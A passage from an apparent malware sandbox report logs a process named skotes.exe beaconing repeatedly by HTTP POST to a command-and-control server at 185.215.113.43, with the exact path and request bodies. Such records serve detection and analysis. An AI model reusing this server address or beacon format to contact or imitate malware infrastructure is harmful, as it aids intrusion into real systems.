                                Nov 20, 2024 13:08:21.141022921 CET8049890185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:21.831510067 CET8049890185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:21.832514048 CET4989080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:23.453704119 CET4989080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:23.454123020 CET4990680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:23.458996058 CET8049906185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:23.459085941 CET4990680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:23.459103107 CET8049890185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:23.459161997 CET4989080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:23.459295988 CET4990680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:23.464267015 CET8049906185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:24.188796997 CET8049906185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:24.191427946 CET4990680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:25.703450918 CET4990680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:25.703774929 CET4991980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:25.708717108 CET8049906185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:25.708749056 CET8049919185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:25.708847046 CET4991980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:25.708864927 CET4990680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:25.709034920 CET4991980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:25.713867903 CET8049919185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:26.411521912 CET8049919185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:26.411668062 CET4991980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:28.031769991 CET4991980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:28.035203934 CET4993480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:28.039208889 CET8049919185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:28.039292097 CET4991980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:28.042216063 CET8049934185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:28.042848110 CET4993480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:28.044898033 CET4993480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:28.051732063 CET8049934185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:28.748363972 CET8049934185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:28.748491049 CET4993480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:30.250471115 CET4993480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:30.250804901 CET4995080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:30.256474972 CET8049950185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:30.256586075 CET4995080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:30.256681919 CET4995080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:30.260802031 CET8049934185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:30.260895014 CET4993480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:30.261956930 CET8049950185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:30.964792967 CET8049950185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:30.964850903 CET4995080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:32.596374989 CET4995080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:32.596750021 CET4996680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:32.601943016 CET8049950185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:32.602032900 CET4995080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:32.602771044 CET8049966185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:32.602864027 CET4996680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:32.602988958 CET4996680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:32.608056068 CET8049966185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:33.301089048 CET8049966185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:33.301167011 CET4996680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:34.813610077 CET4996680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:34.813971043 CET4998280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:34.819003105 CET8049966185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:34.819133997 CET4996680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:34.819717884 CET8049982185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:34.819803953 CET4998280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:34.819969893 CET4998280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:34.825270891 CET8049982185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:35.548026085 CET8049982185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:35.548151016 CET4998280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:37.235249043 CET4998280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:37.235645056 CET4999880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:37.242577076 CET8049998185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:37.242783070 CET8049982185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:37.242887974 CET4998280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:37.242902040 CET4999880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:37.243161917 CET4999880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:37.250129938 CET8049998185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:37.965090036 CET8049998185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:37.965148926 CET4999880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:39.469067097 CET4999880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:39.469412088 CET5001280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:39.474186897 CET8049998185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:39.474252939 CET4999880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:39.474271059 CET8050012185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:39.474343061 CET5001280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:39.474896908 CET5001280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:39.479736090 CET8050012185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:40.175301075 CET8050012185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:40.176635981 CET5001280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:41.806221008 CET5001280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:41.806720972 CET5001880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:41.815289021 CET8050012185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:41.815340042 CET8050018185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:41.815356016 CET5001280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:41.815413952 CET5001880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:41.816001892 CET5001880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:41.821283102 CET8050018185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:42.518135071 CET8050018185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:42.518268108 CET5001880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:44.034210920 CET5001880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:44.034575939 CET5001980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:44.042052031 CET8050018185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:44.042109013 CET8050019185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:44.042200089 CET5001880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:44.042234898 CET5001980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:44.042555094 CET5001980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:44.048803091 CET8050019185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:44.736030102 CET8050019185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:44.736094952 CET5001980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:46.359802008 CET5001980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:46.360202074 CET5002080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:46.369043112 CET8050019185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:46.369067907 CET8050020185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:46.369214058 CET5001980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:46.369256973 CET5002080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:46.369529009 CET5002080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:46.377686024 CET8050020185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:47.083113909 CET8050020185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:47.083214045 CET5002080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:48.656779051 CET5002080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:48.657136917 CET5002180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:48.664155006 CET8050020185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:48.664200068 CET8050021185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:48.664283037 CET5002080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:48.664313078 CET5002180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:48.664452076 CET5002180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:48.671365976 CET8050021185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:49.359998941 CET8050021185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:49.360074997 CET5002180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:50.985124111 CET5002180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:50.985460997 CET5002280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:50.990704060 CET8050022185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:50.990869999 CET8050021185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:50.990900993 CET5002280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:50.990928888 CET5002180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:50.991095066 CET5002280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:50.995919943 CET8050022185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:51.709582090 CET8050022185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:51.709758997 CET5002280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:53.221337080 CET5002280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:53.221770048 CET5002380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:53.227196932 CET8050023185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:53.227299929 CET5002380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:53.227421045 CET5002380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:53.227448940 CET8050022185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:53.227509022 CET5002280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:53.232739925 CET8050023185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:53.936414003 CET8050023185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:53.936579943 CET5002380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:55.562894106 CET5002380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:55.563221931 CET5002480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:55.568361044 CET8050023185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:55.568464994 CET5002380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:55.570133924 CET8050024185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:55.570257902 CET5002480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:55.570486069 CET5002480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:55.575948954 CET8050024185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:56.270329952 CET8050024185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:56.270407915 CET5002480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:57.782058954 CET5002480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:57.782285929 CET5002580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:57.790601969 CET8050025185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:57.791098118 CET8050024185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:57.791198969 CET5002480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:57.791209936 CET5002580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:57.791459084 CET5002580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:57.800014019 CET8050025185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:58.500287056 CET8050025185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:58.500679016 CET5002580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:00.143368959 CET5002580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:00.143579006 CET5002680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:00.150620937 CET8050026185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:00.150732040 CET5002680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:00.150880098 CET5002680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:00.150907993 CET8050025185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:00.150978088 CET5002580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:00.157763004 CET8050026185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:00.852583885 CET8050026185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:00.852847099 CET5002680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:02.364768982 CET5002680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:02.366369009 CET5002780192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:02.371599913 CET8050026185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:02.371736050 CET5002680192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:02.372926950 CET8050027185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:02.373022079 CET5002780192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:02.373483896 CET5002780192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:02.379936934 CET8050027185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:03.078866959 CET8050027185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:03.080607891 CET5002780192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:04.799666882 CET5002780192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:04.800280094 CET5002880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:04.807941914 CET8050027185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:04.808010101 CET5002780192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:04.808423996 CET8050028185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:04.808549881 CET5002880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:04.813427925 CET5002880192.168.2.4185.215.113.43
                                Nov 20, 2024 13:09:04.821029902 CET8050028185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:05.532282114 CET8050028185.215.113.43192.168.2.4
                                Nov 20, 2024 13:09:05.532429934 CET5002880192.168.2.4185.215.113.43
                                • 185.215.113.43
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449783185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:05.080642939 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:05.775851011 CET219INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:05 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.449799185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:07.287128925 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:07.990255117 CET196INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:07 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.449815185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:09.616029978 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:10.320969105 CET219INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:10 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.449831185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:11.836378098 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:12.550599098 CET196INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:12 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.449846185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:14.256150961 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:14.983750105 CET219INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:14 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.449861185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:16.506350040 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:17.254261971 CET196INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:17 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.449878185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:18.883585930 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:19.612067938 CET219INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:19 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.449890185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:21.134896994 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:21.831510067 CET196INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:21 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.449906185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:23.459295988 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
                                Nov 20, 2024 13:08:24.188796997 CET219INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:24 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Refresh: 0; url = Login.php
                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 1 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.449919185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:25.709034920 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 154
                                Cache-Control: no-cache
                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 33 32 45 37 31 42 38 35 31 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B32E71B85182D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                Nov 20, 2024 13:08:26.411521912 CET196INHTTP/1.1 200 OK
                                Server: nginx/1.18.0 (Ubuntu)
                                Date: Wed, 20 Nov 2024 12:08:26 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: keep-alive
                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 7 <c><d>0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.449934185.215.113.43803612C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                TimestampBytes transferredDirectionData
                                Nov 20, 2024 13:08:28.044898033 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                Content-Type: application/x-www-form-urlencoded
                                Host: 185.215.113.43
                                Content-Length: 4
                                Cache-Control: no-cache
                                Data Raw: 73 74 3d 73
                                Data Ascii: st=s
